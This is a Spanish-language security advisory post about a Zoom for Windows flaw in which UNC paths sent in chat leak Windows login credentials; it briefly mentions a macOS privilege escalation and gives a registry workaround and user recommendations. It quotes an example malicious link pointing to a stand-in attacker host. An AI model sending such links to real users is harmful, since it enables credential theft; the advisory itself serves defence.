Vulnerabilidad crítica de Zoom permite robar contraseñas de Windows y escalar privilegios de MacOS
ccastrol
2 min read
Una vulnerabilidad crítica con el cliente Zoom para Windows permite a los atacantes robar las credenciales de inicio de sesión de Windows.
Zoom es una plataforma de comunicación de video en línea que tiene características como videoconferencia, reuniones en línea, chat y colaboración móvil. Y actualmente está siendo bastante usado debido al Home Office al que muchas empresas están aplicando.
Vulnerabilidad de zoom
El cliente de Zoom para Windows admite la Convención de Nomenclatura Universal (UNC), que es la función que convierte las URL enviadas en el chat en hipervínculos.
Entonces, si el usuario hace clic en el enlace, se abrirá con el navegador predeterminado, pero el problema reside en cómo el Zoom maneja las URL. El usuario al hacer click en la URL compartida por Zoom, la cual puede ser: “\\hacker.dominio.com\documentos\fotos.jpg”, automáticamente abrirá su navegador para acceder a una ruta compartida de Windows, y en ese instante estaría enviando sus datos de sesión de Windows (usuario y contraseña).
El atacante que ha recopilado estos datos, posteriormente podría enviar ataques dirigidos para el control de la PC.
Además de esta vulnerabilidad, existe otra para sistemas MacOS, en la que el atacante podría inyectar código en el ejecutable de Zoom, específicamente en los controladores de cámara y micrófono; y escalar privilegios para controlar el sistema del usuario
Alternativa de Solución Temporal
En la siguiente llave Regedit de su PC
\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0
Crear el siguiente DWORD: RestrictSendingNTLMTraffic con el valor Hexadecimal: 2
Puntos objetivos de la amenaza
- Todos los usuarios que utilizan la aplicación Zoom sobre sistemas Windows o MacOS
- Sobre todo aquellos que en estos tiempos están empleando la modalidad de trabajo Home Office
Nuestras recomendaciones
- A todos los usuarios que usan Zoom, tener mucha precaución con las URL que son enviados vía a través del Chat, sobretodo con aquellos que tengan la siguiente apariencia de barra invertida como: \\algo.dominio.com
- En caso anteriormente hayan ingresado a alguna URL similar, se recomienda cambiar sus credenciales de usuario y reportarlo a su área de soporte técnico
- Al equipo de Tecnología, se recomienda difundir esta alerta a los usuarios de su compañía
- Además, de acuerdo a sus recursos tecnológicos, realizar un despliegue factible para aplicar la alternativa de solución temporal para sus usuarios
- Y asegurarse siempre que a nivel de firewall no existan accesos permitidos desde la red interna hacia internet por protocolo SMB (TCP 445)
